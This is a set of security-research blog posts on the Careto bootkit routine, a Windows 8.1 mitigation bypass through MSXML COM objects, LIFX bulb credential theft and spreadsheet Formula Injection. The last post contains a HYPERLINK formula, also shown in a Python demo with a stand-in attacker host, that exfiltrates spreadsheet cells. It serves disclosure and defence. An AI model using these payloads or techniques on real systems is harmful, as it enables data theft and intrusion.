Channel: Context Information Security Blog

Careto Malware Masks Ancient but Deadly Virus DNA


Kaspersky recently discovered a new family of malware, dubbed ‘The Mask’ or ‘Careto’, which it described as one of the “most advanced global cyber-espionage operations to date” [1]. Other anti-virus vendors echo this assessment; McAfee, for example, calls it “highly sophisticated” [2]. This reputation is due in part to the malware's complexity, as well as to its suspected attribution to a nation-state. These comments made it an interesting target for analysis, with a view to examining the techniques used by what is widely considered to be a sophisticated, state-sponsored actor in deploying offensive cyber-weaponry.

We were able to acquire samples and began to analyse them, with a particular interest in the component called ‘SGH’, which Kaspersky described as the most advanced part of The Mask’s toolset. SGH is elsewhere described as having ‘bootkit’ functionality, which is particularly intriguing both for its potential capability and for the power it grants over a target system.

A bootkit is generally understood to mean a rootkit-style agent that has ‘infected’ the boot process of a system. To have malicious code running at the very beginning of the loading of an operating system allows the code to take control and subvert the security of the operating system before it has even started; as such it has the potential to be a very potent weapon.

Despite this fact, the bootkit aspect has come under little scrutiny in the analyses by the AV vendors, so it stood out as the most interesting area to focus on in our research.

Upon examination of SGH, it became clear that the ‘bootkit’ label refers to a subroutine which patches the bootmgr executable file that underpins the Windows boot process. Since the release of Vista, modern Windows systems can boot using one of two technologies: the modern Extensible Firmware Interface (EFI) and the legacy BIOS-based system that has been present in IBM PC-compatible personal computers since the days of DOS.

In the case of BIOS-based systems, which comprise a significant number of Windows systems today, the chain of execution during the boot process is as follows:

[Diagram: BIOS → MBR → VBR → bootmgr]

It might be surprising to note that this early code executed in the MBR, VBR and the beginning of the bootmgr executable is run in 16-bit ‘real’ mode - a legacy mode of the IA32 architecture which PC processors start in. This is true even of modern 64-bit systems that still have a BIOS.

When faced with a binary consisting of 16-bit code running in the real mode of IBM-compatible PC architecture, the malware authors seem to have asked themselves: why reinvent the wheel? Virus writers in the 80s and 90s invented many ingenious 16-bit tricks and techniques. Early in virus evolution the file-appending infection mechanism was pioneered, and The Mask demonstrates that this simple technique can still be effective today. Old tricks are sometimes the best, it seems: the method by which SGH achieves its bootkit functionality and infects the bootmgr binary is exactly this ‘old skool’ 16-bit infection strategy, straight from the history books.

Although the function used to patch bootmgr is not actually invoked in the specific sample we analysed, it is still present, and we can infer how it works by reverse engineering the code. Analysis shows that the function expects two chunks of data: the first is interpreted as the size of the code to be appended to the bootmgr binary; the second is that data itself, taken as the raw bytes of code to be appended to the target.

The function begins by reading the first three bytes of bootmgr. If we disassemble this binary (remembering to choose 16-bit as our architecture) we can see that the very first instruction at the entry point is a jmp instruction, which takes three bytes to encode.

[Disassembly: the 3-byte jmp at the bootmgr entry point]

The first byte (0xE9) defines the instruction as a jmp; the next two bytes are the offset, or relative distance, to jump. The offset is measured from the address immediately following the jmp instruction, which is three bytes in size. In the above case (with bootmgr taken from Windows 7 x64 SP1) these bytes are 0xD5 and 0x01, which when interpreted as a little-endian value is 0x1D5, so the resulting target is 0x1D8. Thus, upon execution, the code in bootmgr immediately jumps forward to this address, where it continues execution.
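As a sanity check, this jump-target arithmetic can be reproduced in a few lines of Python (the function name is ours, purely for illustration):

```python
def decode_jmp_rel16(code: bytes, at: int = 0) -> int:
    """Return the target of a 0xE9 near jmp in 16-bit real mode."""
    assert code[at] == 0xE9, "not a near jmp"
    # The two offset bytes are little-endian, and the offset is measured
    # from the address of the *next* instruction (the jmp is 3 bytes long).
    offset = int.from_bytes(code[at + 1:at + 3], "little")
    return (at + 3 + offset) & 0xFFFF

# The first three bytes of the Windows 7 x64 SP1 bootmgr discussed above.
entry = bytes([0xE9, 0xD5, 0x01])
print(hex(decode_jmp_rel16(entry)))  # 0x1d8
```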

                            

This next section of code is the area the SGH bootmgr-infecting function targets for modification, or ‘patching’. To locate this code reliably across multiple potential versions of the bootmgr binary (which vary between Windows versions), SGH follows this initial jump to the target location. The first thing it does there is check whether the executable has already been infected; in traditional terminology, it checks for an infection marker, which in this case means checking whether the code here has been patched before:

[Disassembly: the infection-marker check]

If it finds the executable has already been patched, it terminates here, as there is no point in repeating the patch (not to mention the complication of appending its own code multiple times).

If it finds that the executable has not already been infected, it reads 8 bytes, which it stores for later use just as a classic virus would, before overwriting them with an indirect jump to the end of the file. This jump is encoded in 8 bytes: two push instructions followed by a retf, or ‘far return’, which pops the values just pushed onto the stack and interprets them as a segmented address, the memory addressing scheme used in the 16-bit real mode of x86-compatible CPUs.

[Disassembly: the push/push/retf patch]

A segmented address consists of a segment and an offset; here the retf takes the two pushed values as the code segment and instruction pointer, loading them into the corresponding registers and thus effectively jumping to that address. The values that SGH places here are calculated from the current location and the file size, and so SGH redirects the execution flow to the end of the file, where it appends its own code, along with a copy of the 8 original bytes it overwrote with the initial patch.

[Diagram]
Old school diagram of old school infection technique.
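The push/push/retf redirection is simple enough to model. The sketch below builds such a patch for a given real-mode linear address; the exact byte encoding, segment:offset split and nop padding are our assumptions, not confirmed details of SGH:

```python
def far_jump_patch(target: int) -> bytes:
    """Build a push/push/retf sequence that far-jumps to a real-mode
    linear address (one possible encoding, not necessarily SGH's)."""
    seg, off = target >> 4, target & 0xF       # one of many seg:off splits
    patch = (
        b"\x68" + seg.to_bytes(2, "little")    # push imm16: segment
        + b"\x68" + off.to_bytes(2, "little")  # push imm16: offset
        + b"\xCB"                              # retf pops IP first, then CS
    )
    return patch.ljust(8, b"\x90")             # pad to the 8 overwritten bytes

# e.g. redirect to the end of a file loaded at 0x2000 with size 0x8000
patch = far_jump_patch(0x2000 + 0x8000)
seg = int.from_bytes(patch[1:3], "little")
off = int.from_bytes(patch[4:6], "little")
assert len(patch) == 8 and seg * 16 + off == 0xA000
```

Note the ordering: since retf pops the instruction pointer from the top of the stack first, the offset must be the last value pushed.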

Because the sample we have seen doesn’t actually use this patching function, we of course haven’t seen what code is intended to be appended to the end of bootmgr, or what purpose it serves. But to have control over the operating system at such an early stage of course imparts great power, so we are very keen to get hold of other samples to see if any of them make use of this feature. In the meantime we are left to wonder whether this resurgence of the 16-bit file-appending infection is due to its simple effectiveness, or whether there is an element of recognition and respect for the original technique and the classic virus writing scene. Perhaps the very same talented virus writers, who back in the 80s and 90s pioneered this and other virus techniques, have now been recruited by the organisation behind The Mask and are working to develop their cyber-weaponry arsenal. In which case the rest of the world beware!


[1]http://www.kaspersky.com/about/news/virus/2014/Kaspersky-Lab-Uncovers-The-Mask-One-of-the-Most-Advanced-Global-Cyber-espionage-Operations-to-Date-Due-to-the-Complexity-of-the-Toolset-Used-by-the-Attackers

[2]http://blogs.mcafee.com/mcafee-labs/careto-unmasked




Bypassing Windows 8.1 Mitigations using Unsafe COM Objects


In October last year I was awarded the first $100,000 bounty for a Mitigation Bypass in Microsoft Windows. My original plan was not to discuss it in any depth until Microsoft had come up with sufficient changes to reduce the impact of the bypass. However, as other researchers have basically come up with variants of the same technique, some of which are publicly disclosed with proof-of-concept code, it seemed silly not to discuss my winning entry. So what follows is some technical detail about the bypass itself.

I am not usually known for finding memory corruption vulnerabilities, mainly because I don’t go looking for them. Still, I know my way around, and so I knew the challenges I would face in trying to come up with a suitable mitigation bypass entry. I realised that about the only way of producing a successful entry would be to take a difficult-to-exploit memory corruption vulnerability and find a way of turning it into reliable code execution.

For that reason I settled on investigating the exploitation of a memory overwrite where the only value you could write was the number 0. Converting a 0 overwrite of this sort into code execution, while not impossible, certainly presents some challenges. I also stipulated that the vulnerability could not disclose the existing contents of memory; if you have an information disclosure vulnerability then it is generally game over anyway, so I was confident that relying on one would not pass for a winning entry.

ActiveX and COM

The attack vector for the mitigation bypass was safe-scriptable COM objects. As COM is a general technology, not limited to safe-scripted environments such as Internet Explorer, there are many unsafe objects which could be abused if they were allowed to be created. To prevent this, hosts such as Internet Explorer use two mechanisms to determine whether an object is safe to use in the host environment: Category IDs and the IObjectSafety interface. The Category IDs CATID_SafeForScripting and CATID_SafeForInitializing can be added to a COM object's registration to indicate to a COM host that the object is safe for scripting or initialisation respectively. These are static indicators, and are not particularly of interest.

Things get more interesting with the IObjectSafety interface which is implemented by the COM object. The host can call the GetInterfaceSafetyOptions method to determine whether a COM object is safe to script or initialise (of course this means that the object must have already been created). The interface also has a secondary purpose; once a host has determined that an object is safe it can call the SetInterfaceSafetyOptions method to tell the object how safe it needs to be.
This method has a particular implication: it allows COM objects to be written in a generic way with potentially dangerous functionality (such as arbitrary script code execution) and then secured at runtime by disabling the unsafe functions. The typical way this is implemented is by setting flags within the object's memory to indicate its security state. This is the attack vector I chose: if we have a suitable memory corruption vulnerability, it might be possible to change these security flags to convert a secure object back into an insecure one and use that to circumvent in-place mitigations.

A related topic is the setting of an object's site. A Site is normally a reference to the hosting environment for the COM object, such as the OLE container or hosting HTML document. This makes a number of security related functions possible, such as enforcing the same-origin policy for COM objects in a web page (through querying for the IHTMLDocument2 interface and reading the URL property), zone determination or accessing the host security manager. Depending on what we attack we might need to deal with the Site as well.

The important point of all this is that, by default, many objects are unsafe until certain flags are stored within the memory allocated for the object. The unsafe state of these flags is therefore the value 0, whereas the safe state is non-zero. This means that with a 0 overwrite vulnerability we can reset the security flags back to the unsafe state and exploit the unsafe functionality of the COM object.

Attacking MSXML

To demonstrate an attack against scriptable COM objects, a suitable object is needed. It must meet a set of criteria that allow us to use the memory corruption vulnerability to bypass mitigations. I determined that the criteria were:

  1. The object must be creatable in common COM hosts without significant security issues such as being blocked by policy or site locking
  2. The object must be available on default Windows installations or be extremely common
  3. The object must do something of benefit to an attacker when insecure, but not expose that functionality when secure (otherwise it would just be a security vulnerability)
  4. It must be relatively trivial to convert from secure to insecure through a minimal number of zero memory overwrites

The COM objects chosen for the demonstration are implemented by the MSXML libraries. Windows 8.1 comes with versions 3 and 6 of the MSXML library installed by default. They are pretty much treated as de facto safe, as without them some websites would break; therefore there are no issues with site-locking or blacklisting. They can even be created in the immersive version of IE without issue. They also have some significant functionality when insecure, namely the ability to circumvent the same-origin policy and to execute fully-privileged script within the context of an XSL transformation.

So MSXML meets the first three criteria, but what about the fourth? Many of the objects that MSXML exposes implement the IObjectSafety interface, which is the mechanism through which safety is enabled, as shown above. The objects also support the INTERFACE_USES_SECURITY_MANAGER flag, which means that an object will use the security manager from the hosting site to make some trust decisions. Reverse engineering the safe objects such as DOMDocument and XMLHTTP shows that they all contain the COMSafeControlRoot structure, which is used to implement the IObjectSafety and security manager features. In MSXML3 this consists of 6 fields: in the default insecure state these values are all NULL, while in a secure object they contain pointers to site objects and security managers, as well as the current security flags set through SetInterfaceSafetyOptions. The rough outline of this structure is shown below:

[Structure outline: COMSafeControlRoot]

Through inspection, I found that of the 6 values in memory only two were important when it came to bypassing the security mechanisms: a pointer to the host security manager at offset 4, and the security flags at offset 20. Crucially, these can be reverted to NULL without causing any other significant effect on the object’s functionality. This means that a very restricted memory corruption could achieve the desired effect, namely our overwrite with zero.
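The effect of the two zero writes can be modelled with ctypes. Only the six-DWORD layout, the offsets 4 and 20 and their roles come from the analysis above; the field names are our placeholders:

```python
import ctypes

class COMSafeControlRoot(ctypes.Structure):
    """Model of MSXML3's six-DWORD safety structure (names assumed)."""
    _fields_ = [("field_0", ctypes.c_uint32),             # offset 0
                ("security_manager", ctypes.c_uint32),    # offset 4
                ("field_8", ctypes.c_uint32),
                ("field_12", ctypes.c_uint32),
                ("field_16", ctypes.c_uint32),
                ("safety_flags", ctypes.c_uint32)]        # offset 20

obj = COMSafeControlRoot(1, 0xCAFE0000, 2, 3, 4, 3)  # a "secured" object
buf = (ctypes.c_char * ctypes.sizeof(obj)).from_buffer(obj)

# The attacker's only primitive: write zero DWORDs at offsets 4 and 20.
for off in (4, 20):
    buf[off:off + 4] = b"\x00\x00\x00\x00"

# Security manager and safety flags are back in the default unsafe state.
assert obj.security_manager == 0 and obj.safety_flags == 0
```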

Finding an Object in Memory

The biggest issue with this technique is that whilst it would be easy enough to modify an object in memory to disable the security without an information disclosure vulnerability, we would not know where it was. If you had an information disclosure vulnerability you probably would not need to use this technique at all.

The bypass must be able to guess the location of a valid object in memory and attack it blind. The design of typical scriptable COM hosts comes in handy here in achieving this goal:

  1. They usually allow you to create an arbitrary number of new objects, which allows the heap to be flooded with object instances
  2. The allocation of COM objects is up to the COM library to implement; it might therefore not follow best practice, or it might disable security mitigations
  3. The scripting ability allows specific sequences of operations to be executed to improve the reliability of allocation patterns

In the general case this makes it a lot easier to use a heap flood technique to generate a reliable pattern of objects on the heap and of a large enough size to guess the location of an object. If a regular pattern of objects can be achieved we can use an arbitrary overwrite to modify values in memory through a guessed location and then find the insecure object to execute our code.

There are some issues with the heap improvements in Windows 8. For a start, there is a new mitigation called Low Fragmentation Heap Randomisation. The Low Fragmentation Heap (LFH) is a special memory heap used for small allocations, to reduce the amount of memory fragmentation that occurs as memory is allocated and freed. In Windows 8 the order in which blocks are allocated has a random element to it, which makes it more difficult to lay out guessable patterns of allocations.

That said, once you start allocating thousands of objects it is still possible to achieve some level of reliability in the allocations. MSXML3, however, provides an ideal case: presumably for legacy reasons, when running on a multi-processor system it creates its own heap, passing the HEAP_NO_SERIALIZE flag. This means that the LFH is disabled, which also disables some of the heap improvements in Windows 8, making the heap flood considerably more reliable.

The targeted COM object in that library is MSXML2.XMLHTTP.3.0, chosen because it has a considerably smaller heap footprint than DOMDocument, which would be the more obvious choice. As long as the object has been opened, you can read its responseXML property (even without sending the request) to get a DOMDocument object. This document inherits the security settings of the parent XMLHTTP object, which allows us to modify the XMLHTTP object and then use the document to execute arbitrary script code.

To lay out the heap, the provided PoC creates 40,000 instances of XMLHTTP and stores them in an array. Each instance also has the ‘open’ method called on it and a request header set, to increase the allocation size for a single object. This results in a repeating 8192-byte pattern of objects being created in memory, which looks similar to the following:

[Diagram: repeating 8192-byte pattern of XMLHTTP allocations]
The actual code was quite simple:

[Code: JScript loop creating 40,000 XMLHTTP instances, calling ‘open’ and setting a request header on each]

Once the heap was flooded, the next step was to write the 0 values to a guessed address. The address was chosen empirically, and for the proof-of-concept the overwrite was actually performed using a custom control rather than a real memory corruption vulnerability. By guessing the base address of an object and writing 0s to offsets 4 and 20, we will have disabled the security on one XMLHTTP object; we just need to find which one. For that, the proof-of-concept simply enumerated all allocated objects, trying each in turn with an XSL document containing an msxsl:script tag with JScript to start notepad. If the object is still secure this process throws an exception; if not, we have succeeded, notepad has been executed and we can stop looking.
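The spray, blind overwrite and scan can be illustrated with a toy simulation (a model of the idea only, not the actual JScript PoC; the 8192-byte stride and the offsets 4 and 20 come from the text, everything else is invented):

```python
STRIDE = 8192                       # observed allocation pattern size
N = 400                             # scaled down from the PoC's 40,000
heap = bytearray(STRIDE * N)

# Flood: mark every simulated XMLHTTP object as "secured".
for i in range(N):
    base = i * STRIDE
    heap[base + 4:base + 8] = (0xCAFE0000).to_bytes(4, "little")
    heap[base + 20:base + 24] = (3).to_bytes(4, "little")

# Blind overwrite: zero offsets 4 and 20 at a guessed object base.
guess = 123 * STRIDE
for off in (4, 20):
    heap[guess + off:guess + off + 4] = bytes(4)

# Scan: "try each object in turn" until one's security is disabled.
hit = [i for i in range(N)
       if heap[i * STRIDE + 20:i * STRIDE + 24] == bytes(4)]
print(hit)  # [123]
```

The regular stride is what makes the guess feasible: any address of the form base + k * 8192 lands at the same offset within some object.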

Real World Zero Overwrites

Of course this entire bypass is predicated on finding a vulnerability which allows you to perform an arbitrary overwrite with a 0. How likely is that in the real world? Honestly, I cannot give any figures, but don't forget that 0 is the typical default state for values, so any code which tries to initialize a value under an attacker's control will probably set it to zero.

A good example is COM itself. Every COM object must implement the IUnknown interface, whose first function, QueryInterface, is used to convert the object to different interface types. It takes a pointer to the IID and a pointer to a pointer for the returned interface, assuming the object supports the requested interface. It is recommended that if the object doesn't support the interface, it should ensure the outbound pointer is set to NULL before returning.

If you've already guessed the location of a COM object you might only be a V-Table dereference away from your coveted arbitrary zero overwrite.

Conclusions

Obviously this particular example has limitations. It only worked reliably in 32-bit versions of IE, as heap flooding is very difficult to do reliably on 64-bit. Of course, if you combine this technique with a memory disclosure vulnerability, you can achieve code execution without needing to control EIP.

The technique is more general than just COM objects in IE: any structure in a program which has both safe and unsafe functionality is a suitable target. The PoC was necessary to demonstrate the potential. It is interesting that techniques like this are subject to convergent discovery; I wasn't the only person to stumble upon a similar idea, and the only reason it is an issue now is that the easy routes of exploitation have been closed.

Hacking into Internet Connected Light Bulbs


The subject of this blog, the LIFX light bulb, bills itself as the light bulb reinvented; a “WiFi enabled multi-color [sic], energy efficient LED light bulb” that can be controlled from a smartphone [1]. We chose to investigate this device due to its use of emerging wireless network protocols, the way it came to market and its appeal to the technophile in all of us. The LIFX project started off on crowd funding website Kickstarter in September 2012 where it proved hugely popular, bringing in over 13 times its original funding target.

LIFX bulbs connect to a WiFi network in order to allow them to be controlled using a smart phone application. In a situation where multiple bulbs are available, only one bulb will connect to the network. This “master” bulb receives commands from the smart phone application, and broadcasts them to all other bulbs over an 802.15.4 6LoWPAN wireless mesh network.


WiFi and 802.15.4 6LoWPAN Mesh Network

In the event of the master bulb being turned off or disconnected from the network, one of the remaining bulbs elects to take its position as the master and connects to the WiFi network ready to relay commands to any further remaining bulbs. This architecture requires only one bulb to be connected to the WiFi at a time, which has numerous benefits including allowing the remaining bulbs to run on low power when not illuminated, extending the useable range of the bulb network to well past that of just the WiFi network and reducing congestion on the WiFi network.

Needless to say, the use of emerging wireless communication protocols, mesh networking and master / slave communication roles interested the hacker in us, so we picked up a few bulbs and set about our research.

The research presented in this blog was performed against version 1.1 of the LIFX firmware. Since reporting the findings to LIFX, version 1.2 has been made available for download.

Analysing the Attack Surface

There are three core communication components in the LIFX bulb network:

1. Smart phone to bulb communication
2. Bulb WiFi communication
3. Bulb mesh network communication

Due to the technical challenges involved, the specialist equipment required and the general perception that it would be the hardest component to attack, we decided to begin our search for vulnerabilities in the intra-bulb 802.15.4 6LoWPAN wireless mesh network. Specifically, we decided to investigate how the bulbs share the WiFi network credentials between themselves over the 6LoWPAN mesh network.

6LoWPAN is a wireless communication specification built upon IEEE 802.15.4, the same base standard used by Zigbee, designed to allow IPv6 packets to be forwarded over low power Personal Area Networks (PANs).

In order to monitor and inject 6LoWPAN traffic, we required a peripheral device which uses the 802.15.4 specification. The device chosen for this task was the ATMEL AVR Raven [2] installed with the Contiki 6LoWPAN firmware image [3]. This presents a standard network interface from which we could monitor and inject network traffic into the LIFX mesh network.

Protocol Analysis

With the Contiki-installed Raven presenting a network interface, we were in a position to monitor and inject network traffic into the LIFX mesh network. The protocol observed appeared to be, for the most part, unencrypted. This allowed us to easily dissect the protocol, craft messages to control the light bulbs and replay arbitrary packet payloads.

Monitoring packets captured from the mesh network whilst adding new bulbs, we were able to identify the specific packets in which the WiFi network credentials were shared among the bulbs. The on-boarding process consists of the master bulb broadcasting for new bulbs on the network. A new bulb responds to the master and then requests the WiFi details to be transferred. The master bulb then broadcasts the WiFi details, encrypted, across the mesh network. The new bulb is then added to the list of available bulbs in the LIFX smart phone application.


Wireshark 6LoWPAN packet capture

As can be observed in the packet capture above, the WiFi details, including credentials, were transferred as an encrypted binary blob.

Further analysis of the on-boarding process identified that we could inject packets into the mesh network to request the WiFi details without the master bulb first beaconing for new bulbs. Moreover, requesting just the WiFi details did not add any new devices or raise any alerts within the LIFX smart phone application.

At this point we could arbitrarily request the WiFi credentials from the mesh network, but did not have the necessary information to decrypt them. In order to take this attack any further we would need to identify and understand the encryption mechanism in use.

Obtaining the Firmware

In the normal course of gaining an understanding of encryption implementations on new devices, we first start with analysing the firmware. In an ideal world, this is simply a case of downloading the firmware from the vendor website, unpacking, decrypting or otherwise mangling it into a format we can use and we are ready to get started. However, at the time of the research the LIFX device was relatively new to market, therefore the vendor had not released a firmware download to the public that we could analyse. In this case, we have to fall back to Plan B and go and obtain the firmware for ourselves.

In order to extract the firmware from the device, we first need to gain physical access to the microcontrollers embedded within; an extremely technical process, which to the layman may appear to be no more than hitting it with a hammer until it spills its insides. Once removed from the casing, the Printed Circuit Board (PCB) is accessible providing us with the access we require.


Extracted LIFX PCB

It should be noted that public sources can be consulted if only visual access to the PCB is needed. The American Federal Communications Commission (FCC) often releases detailed teardowns of communications equipment, which can be a great place to start if the hammer technique is considered slightly over the top [4].

Analysing the PCB we were able to determine that the device is made up primarily of two System-on-Chip (SoC) Integrated Circuits (ICs): a Texas Instruments CC2538 that is responsible for the 6LoWPAN mesh network side of the device communication; and a STMicroelectronics STM32F205ZG (marked LIFX LWM-01-A), which is responsible for the WiFi side of the communication. Both of these chips are based on the ARM Cortex-M3 processor. Further analysis identified that JTAG pins for each of the chips were functional, with headers presented on the PCB.

JTAG, which stands for Joint Test Action Group, is the commonly used name for the IEEE 1149.1 standard, which describes a protocol for testing microcontrollers for defects and debugging hardware through a Test Access Port (TAP) interface.

Once the correct JTAG pins for each of the chips were identified, a process which required manual pin tracing, specification analysis and automated probing, we were ready to connect to the JTAG interfaces of the chips. In order to control the JTAG commands sent to the chips, a combination of hardware and software is required. The hardware used in this case was the open hardware BusBlaster JTAG debugger [5], which was paired with the open source Open On-Chip Debugger (OpenOCD) [6]. After configuring the hardware and software pair, we were in a position where we could issue JTAG commands to the chips.
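For illustration, a flash dump along these lines can be driven from OpenOCD, which ships configuration files for both the BusBlaster and the STM32F2 family. Treat this as a sketch: the config file names, the flash base address (0x08000000 is the standard mapping for STM32 internal flash) and the 1MB size (per the STM32F205ZG part) should be checked against your own setup:

```shell
# Sketch: attach over JTAG and dump the STM32F205's internal flash
openocd -f interface/ftdi/dp_busblaster.cfg \
        -f target/stm32f2x.cfg \
        -c "init; halt; dump_image lifx-stm32.bin 0x08000000 0x100000; shutdown"
```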


BusBlaster JTAG debugger [5]

At this point we can merrily dump the flash memory from each of the chips and start the firmware reverse engineering process.

Reversing the Firmware

Now in possession of two binary blob firmware images, we needed to identify which image was responsible for storing and encrypting the WiFi credentials. A quick “strings” on the images identified that the credentials were stored in the firmware image from the LIFX LWM-01-A chip.

Loading the firmware image into IDA Pro, we could then identify the encryption code by looking for common cryptographic constants: S-Boxes, Forward and Reverse Tables and Initialization Constants. This analysis identified that an AES implementation was being used.
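This constant-scanning step is easy to reproduce outside IDA: the AES forward S-box always begins with the same well-known byte sequence, so a simple search flags candidate tables in a dump. A minimal sketch (the blob below is a stand-in, not real LIFX firmware):

```python
# First 16 bytes of the standard AES forward S-box.
AES_SBOX_PREFIX = bytes([0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5,
                         0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76])

def find_aes_sbox(firmware: bytes) -> int:
    """Return the offset of an embedded AES S-box, or -1 if absent."""
    return firmware.find(AES_SBOX_PREFIX)

# Toy stand-in for a dumped image: padding, then the table fragment.
blob = bytes(100) + AES_SBOX_PREFIX + bytes(300)
print(find_aes_sbox(blob))  # 100
```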

AES, being a symmetric encryption cipher, requires both the encrypting party and the decrypting party to have access to the same pre-shared key. In a design such as the one employed by LIFX, this immediately raises alarm bells, implying that each device is issued with a constant global key. If the pre-shared key can be obtained from one device, it can be used to decrypt messages sent from all other devices using the same key. In this case, the key could be used to decrypt encrypted messages sent from any LIFX bulb.

References to the cryptographic constants can also be used to identify the assembly code responsible for implementing the encryption and decryption routines. With the assistance of a free software AES implementation [7], reversing the identified encryption functions to extract the encryption key, initialization vector and block mode was relatively simple.


IDA Pro disassembly of firmware encryption code

The final step was to prove the accuracy of the extracted encryption variables by using them to decrypt WiFi credentials sniffed off the mesh network.

Putting it All Together

Armed with knowledge of the encryption algorithm, key, initialization vector and an understanding of the mesh network protocol we could then inject packets into the mesh network, capture the WiFi details and decrypt the credentials, all without any prior authentication or alerting of our presence. Success!

It should be noted that, since this attack works over the 802.15.4 6LoWPAN wireless mesh network, an attacker would need to be within wireless range (~30 metres) of a vulnerable LIFX bulb to perform it, severely limiting the practicality of exploitation on a large scale.

Vendor Fix
Context informed LIFX of our research findings, and they were proactive in their response. Context have since worked with LIFX to help them provide a fix for this specific issue, along with other further security improvements. The fix, which is included in the new firmware available at http://updates.lifx.co/, now encrypts all 6LoWPAN traffic using an encryption key derived from the WiFi credentials, and includes functionality for secure on-boarding of new bulbs onto the network.

Of course, as with any internet connecting device, whether phone, laptop, light bulb or rabbit, there is always a chance of someone being able to hack it. Look forward to our upcoming blogs for more details.

References

[1] http://lifx.co

[2] http://www.atmel.com/tools/avrraven.aspx

[3] http://www.contiki-os.org/

[4] https://apps.fcc.gov/oetcf/eas/reports/ViewExhibitReport.cfm?mode=Exhibits&RequestTimeout=500&calledFromFrame=N&application_id=216608&fcc_id=2AA53-LIFX01

[5] http://dangerousprototypes.com/docs/Bus_Blaster

[6] http://openocd.sourceforge.net/

[7] http://svn.ghostscript.com/ghostscript/tags/ghostscript-9.01/base/aes.c




A Cruel Interest: Attacker motivations for targeting the financial services sector


A question we often get asked is “why would APTs target my organisation, what could a state sponsored attacker possibly want with us?” While the core areas of government and the defence establishment seem like obvious targets, and to most people there is an intuitive understanding of the motivations behind those attacks, you don’t have to wander far from these sectors for the understanding to become a bit more clouded.

One of the more interesting sectors in regard to this, and an area where we find this type of question arises a lot, is the financial services sector. Generally, organisations in the finance sector are above the median in terms of their overall security posture and understand their traditional threats very well. The motivations of their traditional foes, in the form of criminal actors, are comfortingly straightforward and indeed haven’t changed that much from the days of Tommy-gun-wielding public enemies making off on the running boards of vintage Chevys.

Beyond the bank robber motivations what else is likely to drive attacks against this sector?

Aside from the motivation provided by immediate financial benefit, attackers will also take the longer view and go after finance sector companies because of their involvement in sensitive commercial projects: for example, where they provide funding for development, new ventures or exploration, or where they are involved in merger and acquisition activity. Closely related to this is the likelihood that many finance companies, whether they realise it or not, aggregate information from a wide range of third-party organisations that are valuable targets themselves.

Regardless of specific tasking or any immediate prospect of monetisation, this aggregated information is likely to be of great interest to cyber criminals and targeted groups alike. Criminal actors could capitalise on it for financial benefit through more indirect means, such as piggybacking on associated stock movements; on the targeted side, it is invaluable intelligence for state-owned enterprises on the one hand, and for more traditional industrial/commercial espionage on the other. The insight provided by access to this information could be leveraged to gain a competitive edge in commercial negotiations or bidding processes, or to reveal competitor business plans more generally.

Another angle is hinted at by the Gauss infections originally publicised by Kaspersky in 2012[1]. While it is difficult to define the exact intent of the people behind Gauss, the inclusion of capability to target several financial institutions raises interesting questions about targeting by state-sponsored actors. In keeping with Kaspersky’s proposed attribution of Gauss and its purported siblings (Stuxnet, Duqu and Flame) to an Israeli state entity, one could postulate that such a program would provide valuable FININT[2] to a state intelligence mission, perhaps highlighting the movement of funds which eventually fuel the work of groups of interest such as Hezbollah.

Regardless of whether or not this particular theory is correct, as a general rule a subset of state-sponsored targeted attack groups will have an interest in financial institutions in order to track the finances and financing of groups of interest. While there are often legal frameworks allowing this access and analysis, in situations where this may not be possible through the usual law enforcement means the arts of cyber espionage may be leveraged. In essence this highlights how traditional intelligence gathering for national security related purposes is a likely motivation for state-sponsored groups, alongside the IP theft/economic advantage motivations that have dominated many of the campaigns brought to light in recent times.

Beyond this there is also the as yet hypothetical case of attackers penetrating financial institutions in order to stage tools to facilitate disruption of financial markets, payment systems and global money flow as an offensive capability (getting into that much hackneyed area of Cyber Warfare). Although this has yet to be seen, we have seen some pointers to this previously, in the form of the 2007 Estonian internet attacks[3] and the attacks against Georgian websites during the 2008 Russian-Georgia conflict[4]. While entirely hypothetical at this stage it would seem to be a safe bet that many states would at least consider developing this capability - not to mention the aspirations of hacktivist groups or nationalistically motivated "cyber-militias".


[1]http://www.kaspersky.com/about/news/virus/2012/Kaspersky_Lab_and_ITU_Discover_Gauss_A_New_Complex_Cyber_Threat_Designed_to_Monitor_Online_Banking_Accounts

[2]http://en.wikipedia.org/wiki/Financial_intelligence

[3]www.symantec.com/connect/blogs/politics-wire

[4]www.economist.com/node/12673385

Comma Separated Vulnerabilities

This post introduces Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality in web applications to attack users and steal spreadsheet contents. It also details a command injection exploit for Apache OpenOffice and LibreOffice that can be delivered using this technique.


Formula Injection

Many modern web applications and frameworks offer spreadsheet export functionality, allowing users to download data in a .csv or .xls file suitable for handling in spreadsheet applications like Microsoft Excel and OpenOffice Calc.  The resulting spreadsheet’s cells often contain input from untrusted sources such as survey responses, transaction details, and user-supplied addresses.

This is inherently risky, because any cells starting with the ‘=’ character will be interpreted by the spreadsheet software as formulae. For example, picture an online store that allows administrators to export the details of all recent purchases. If a malicious customer buys a product and sets their delivery address to the following:

        =HYPERLINK("http://contextis.co.uk?leak="&A1&A2, "Error: please click for further information")

The administrator’s ‘recent purchases’ spreadsheet will contain the following cell:


If the administrator clicks this cell, they will inadvertently exfiltrate the contents of cells A1 and A2 to http://contextis.co.uk, which may include other users’ payment details.
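To illustrate how this situation arises, here is a hypothetical Python export routine (the function, field names and data are illustrative, not taken from any real application) that writes user-supplied fields straight into a CSV with no sanitisation, which is all an attacker needs:

```python
import csv
import io

def export_purchases(purchases):
    """Naive 'export to spreadsheet' endpoint: user-supplied fields are
    written verbatim, so a cell starting with '=' becomes a live formula
    when the file is opened in spreadsheet software."""
    out = io.StringIO()
    writer = csv.writer(out)
    writer.writerow(["customer", "product", "delivery_address"])
    for row in purchases:
        writer.writerow(row)  # no check for formula trigger characters
    return out.getvalue()

# A customer sets their 'delivery address' to a malicious formula:
malicious = [("mallory", "widget",
              '=HYPERLINK("http://attacker.example?leak="&A1&A2,"click me")')]
print(export_purchases(malicious))
```

The CSV module quotes the field correctly as text, but that offers no protection: spreadsheet software strips the quoting on import and still evaluates the cell as a formula.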


Delivering exploits

Malicious formulae pose a risk even when the embedding spreadsheet doesn’t contain any sensitive information, as they can be used to compromise the viewer’s computer.

Dynamic Data Exchange (DDE) is a protocol for interprocess communication under Windows supported by Microsoft Excel, LibreOffice and Apache OpenOffice. In the latter two, it can be invoked using the following formula:

        =DDE(server; file; item; mode)

